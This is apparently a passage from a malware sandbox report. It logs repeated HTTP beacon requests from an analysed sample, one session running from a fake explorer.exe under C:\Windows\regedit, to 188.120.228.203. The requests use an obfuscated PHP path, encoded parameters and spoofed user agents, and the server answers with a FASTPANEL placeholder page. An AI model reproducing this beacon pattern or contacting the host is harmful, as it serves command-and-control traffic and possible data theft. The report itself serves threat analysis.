                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.949785188.120.228.20380
                                              TimestampBytes transferredDirectionData
                                              Nov 27, 2024 04:02:31.998044968 CET731OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/csv
                                              User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
                                              Nov 27, 2024 04:02:33.365844011 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Nov 27, 2024 04:02:33.365963936 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co
                                              Nov 27, 2024 04:02:33.366022110 CET1236INData Raw: 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69
                                              Data Ascii: ng:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:center;justify-content:c
                                              Nov 27, 2024 04:02:33.366034985 CET448INData Raw: 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 30 36 32 35 72 65 6d 3b 66 6f 6e
                                              Data Ascii: fy-content:center;align-items:center;text-align:center;border-radius:1.0625rem;font-weight:500;padding:.375rem .8125rem}@media (min-width:45.625em){.window-main__actions,.window-main__body{margin-top:1.875rem}.window-main{padding:3.75rem 8.937
                                              Nov 27, 2024 04:02:33.366108894 CET1236INData Raw: 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65
                                              Data Ascii: }@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__ite
                                              Nov 27, 2024 04:02:33.366122007 CET1236INData Raw: 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e
                                              Data Ascii: n{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20rem)/ 25.625)}}@supports (paddin
                                              Nov 27, 2024 04:02:33.366132975 CET448INData Raw: 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 6e 66 6f 7b 6d 61
                                              Data Ascii: m:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.w
                                              Nov 27, 2024 04:02:33.366143942 CET1236INData Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                                              Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
                                              Nov 27, 2024 04:02:33.366302967 CET224INData Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                                              Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.69
                                              Nov 27, 2024 04:02:33.366321087 CET1236INData Raw: 36 20 32 33 31 2e 31 33 33 20 33 36 33 2e 30 31 38 20 32 36 32 2e 33 35 36 20 33 38 31 2e 39 39 31 20 33 32 38 2e 39 39 43 32 38 37 2e 39 39 20 34 31 38 2e 34 37 32 20 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 20 33 36 30 2e 35 32 32 20 35 36
                                              Data Ascii: 6 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.3996" rx="50.6112" ry="60.3996"
                                              Nov 27, 2024 04:02:33.486138105 CET1236INData Raw: 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 46 6c 6f 6f 64 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 3d 22 30 22 20 72 65 73 75 6c 74 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 2f 3e 0a 09 09
                                              Data Ascii: lters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBl
                                              Nov 27, 2024 04:02:33.584337950 CET707OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/csv
                                              User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:34.027124882 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.949806188.120.228.20380616C:\Windows\regedit\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 27, 2024 04:02:41.538192987 CET694OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
                                              Nov 27, 2024 04:02:42.961347103 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Nov 27, 2024 04:02:42.961366892 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co
                                              Nov 27, 2024 04:02:42.961410046 CET224INData Raw: 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69
                                              Data Ascii: ng:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:cente
                                              Nov 27, 2024 04:02:42.961421013 CET1236INData Raw: 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 76 77 3b 70 61 64 64 69 6e 67 3a 31 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69
                                              Data Ascii: r;justify-content:center;min-height:100vh;min-width:100vw;padding:1rem}.window-main{background-color:#13151a;border-radius:.75rem;max-width:45.625rem}.window-main .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-
                                              Nov 27, 2024 04:02:42.961431980 CET224INData Raw: 64 64 69 6e 67 3a 33 2e 37 35 72 65 6d 20 38 2e 39 33 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 62 6f 64 79 7b 66
                                              Data Ascii: dding:3.75rem 8.9375rem}.window-main__title{font-size:2.25rem}.window-main__body{font-size:1.0625rem}.window-main__info{margin-bottom:1.875rem}.window-main__list{padding-left:.6875rem}.window-main__item{padding-left:.875rem}
                                              Nov 27, 2024 04:02:42.961483955 CET1236INData Raw: 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65
                                              Data Ascii: }@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__ite
                                              Nov 27, 2024 04:02:42.961498022 CET1236INData Raw: 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e
                                              Data Ascii: n{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20rem)/ 25.625)}}@supports (paddin
                                              Nov 27, 2024 04:02:42.961548090 CET448INData Raw: 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 6e 66 6f 7b 6d 61
                                              Data Ascii: m:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.w
                                              Nov 27, 2024 04:02:42.961585045 CET1236INData Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                                              Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
                                              Nov 27, 2024 04:02:42.961666107 CET1236INData Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                                              Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 2
                                              Nov 27, 2024 04:02:43.081641912 CET1236INData Raw: 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 31 32 34 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09
                                              Data Ascii: stdDeviation="124" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
                                              Nov 27, 2024 04:02:43.103537083 CET670OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:43.559287071 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.949827188.120.228.20380
                                              TimestampBytes transferredDirectionData
                                              Nov 27, 2024 04:02:49.794919968 CET640OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
                                              Nov 27, 2024 04:02:51.178966999 CET1236INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:
                                              Nov 27, 2024 04:02:51.178983927 CET1236INData Raw: 31 30 30 25 7d 62 75 74 74 6f 6e 2c 6f 70 74 69 6f 6e 2c 73 65 6c 65 63 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 75 6c 20 6c
                                              Data Ascii: 100%}button,option,select{cursor:pointer}a{color:inherit;text-decoration:none}ul li{list-style:none}img{vertical-align:top}h1,h2,h3,h4,h5,h6{font-weight:inherit;font-size:inherit}.lock body{overflow:hidden;touch-action:none;-ms-scroll-chaining
                                              Nov 27, 2024 04:02:51.178996086 CET1236INData Raw: 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 31 30 70 78 3b 77 69 64 74 68 3a 34 70 78 3b 68 65 69 67 68 74 3a 34 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 77 69 6e
                                              Data Ascii: ;left:0;top:10px;width:4px;height:4px;border-radius:50%;background-color:#fff}.window-main__actions{display:flex;justify-content:center}.window-main__actions a{min-height:34px;border:2px solid #2b313d;display:flex;flex-direction:column;justify
                                              Nov 27, 2024 04:02:51.179064035 CET1236INData Raw: 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e 30 32 34 33 39 30 32 34 33 39 76 77 20 2c 38
                                              Data Ascii: em)){.window-main{padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)}}@supports not (padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-left:calc(1.5rem + 7.4375*(100vw - 20re
                                              Nov 27, 2024 04:02:51.179076910 CET1236INData Raw: 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 30 2e 39 31 34 36 33 34 31 34 36 33 72 65 6d 20 2b 20 32 2e 39 32 36 38 32 39 32 36 38 33 76 77 20 2c 32 2e 32 35
                                              Data Ascii: 25.625)}}@supports (font-size:clamp(1.5rem ,0.9146341463rem + 2.9268292683vw ,2.25rem)){.window-main__title{font-size:clamp(1.5rem ,.9146341463rem + 2.9268292683vw ,2.25rem)}}@supports not (font-size:clamp(1.5rem ,0.9146341463rem + 2.926829268
